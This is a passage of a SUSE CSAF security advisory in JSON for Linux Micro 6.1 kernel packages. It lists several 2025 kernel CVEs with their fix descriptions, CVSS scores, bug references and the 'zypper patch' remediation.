"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68185"
},
{
"cve": "CVE-2025-68188",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68188"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check()\n\nUse RCU to avoid a pair of atomic operations and a potential\nUAF on dst_dev()-\u003eflags.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68188",
"url": "https://www.suse.com/security/cve/CVE-2025-68188"
},
{
"category": "external",
"summary": "SUSE Bug 1255269 for CVE-2025-68188",
"url": "https://bugzilla.suse.com/1255269"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68188"
},
{
"cve": "CVE-2025-68190",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68190"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu/atom: Check kcalloc() for WS buffer in amdgpu_atom_execute_table_locked()\n\nkcalloc() may fail. When WS is non-zero and allocation fails, ectx.ws\nremains NULL while ectx.ws_size is set, leading to a potential NULL\npointer dereference in atom_get_src_int() when accessing WS entries.\n\nReturn -ENOMEM on allocation failure to avoid the NULL dereference.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68190",
"url": "https://www.suse.com/security/cve/CVE-2025-68190"
},
{
"category": "external",
"summary": "SUSE Bug 1255131 for CVE-2025-68190",
"url": "https://bugzilla.suse.com/1255131"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68190"
},
{
"cve": "CVE-2025-68192",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68192"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: qmi_wwan: initialize MAC header offset in qmimux_rx_fixup\n\nRaw IP packets have no MAC header, leaving skb-\u003emac_header uninitialized.\nThis can trigger kernel panics on ARM64 when xfrm or other subsystems\naccess the offset due to strict alignment checks.\n\nInitialize the MAC header to prevent such crashes.\n\nThis can trigger kernel panics on ARM when running IPsec over the\nqmimux0 interface.\n\nExample trace:\n\n Internal error: Oops: 000000009600004f [#1] SMP\n CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Not tainted 6.12.34-gbe78e49cb433 #1\n Hardware name: LS1028A RDB Board (DT)\n pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n pc : xfrm_input+0xde8/0x1318\n lr : xfrm_input+0x61c/0x1318\n sp : ffff800080003b20\n Call trace:\n xfrm_input+0xde8/0x1318\n xfrm6_rcv+0x38/0x44\n xfrm6_esp_rcv+0x48/0xa8\n ip6_protocol_deliver_rcu+0x94/0x4b0\n ip6_input_finish+0x44/0x70\n ip6_input+0x44/0xc0\n ipv6_rcv+0x6c/0x114\n __netif_receive_skb_one_core+0x5c/0x8c\n __netif_receive_skb+0x18/0x60\n process_backlog+0x78/0x17c\n __napi_poll+0x38/0x180\n net_rx_action+0x168/0x2f0",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68192",
"url": "https://www.suse.com/security/cve/CVE-2025-68192"
},
{
"category": "external",
"summary": "SUSE Bug 1255246 for CVE-2025-68192",
"url": "https://bugzilla.suse.com/1255246"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68192"
},
{
"cve": "CVE-2025-68194",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68194"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: imon: make send_packet() more robust\n\nsyzbot is reporting that imon has three problems which result in\nhung tasks due to forever holding device lock [1].\n\nFirst problem is that when usb_rx_callback_intf0() once got -EPROTO error\nafter ictx-\u003edev_present_intf0 became true, usb_rx_callback_intf0()\nresubmits urb after printk(), and resubmitted urb causes\nusb_rx_callback_intf0() to again get -EPROTO error. This results in\nprintk() flooding (RCU stalls).\n\nAlan Stern commented [2] that\n\n In theory it\u0027s okay to resubmit _if_ the driver has a robust\n error-recovery scheme (such as giving up after some fixed limit on the\n number of errors or after some fixed time has elapsed, perhaps with a\n time delay to prevent a flood of errors). Most drivers don\u0027t bother to\n do this; they simply give up right away. This makes them more\n vulnerable to short-term noise interference during USB transfers, but in\n reality such interference is quite rare. There\u0027s nothing really wrong\n with giving up right away.\n\nbut imon has a poor error-recovery scheme which just retries forever;\nthis behavior should be fixed.\n\nSince I\u0027m not sure whether it is safe for imon users to give up upon any\nerror code, this patch takes care of only union of error codes chosen from\nmodules in drivers/media/rc/ directory which handle -EPROTO error (i.e.\nir_toy, mceusb and igorplugusb).\n\nSecond problem is that when usb_rx_callback_intf0() once got -EPROTO error\nbefore ictx-\u003edev_present_intf0 becomes true, usb_rx_callback_intf0() always\nresubmits urb due to commit 8791d63af0cf (\"[media] imon: don\u0027t wedge\nhardware after early callbacks\"). Move the ictx-\u003edev_present_intf0 test\nintroduced by commit 6f6b90c9231a (\"[media] imon: don\u0027t parse scancodes\nuntil intf configured\") to immediately before imon_incoming_packet(), or\nthe first problem explained above happens without printk() flooding (i.e.\nhung task).\n\nThird problem is that when usb_rx_callback_intf0() is not called for some\nreason (e.g. flaky hardware; the reproducer for this problem sometimes\nprevents usb_rx_callback_intf0() from being called),\nwait_for_completion_interruptible() in send_packet() never returns (i.e.\nhung task). As a workaround for such situation, change send_packet() to\nwait for completion with timeout of 10 seconds.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68194",
"url": "https://www.suse.com/security/cve/CVE-2025-68194"
},
{
"category": "external",
"summary": "SUSE Bug 1255325 for CVE-2025-68194",
"url": "https://bugzilla.suse.com/1255325"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68194"
},
{
"cve": "CVE-2025-68195",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68195"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/CPU/AMD: Add missing terminator for zen5_rdseed_microcode\n\nRunning x86_match_min_microcode_rev() on a Zen5 CPU trips up KASAN for an out\nof bounds access.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68195",
"url": "https://www.suse.com/security/cve/CVE-2025-68195"
},
{
"category": "external",
"summary": "SUSE Bug 1255259 for CVE-2025-68195",
"url": "https://bugzilla.suse.com/1255259"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
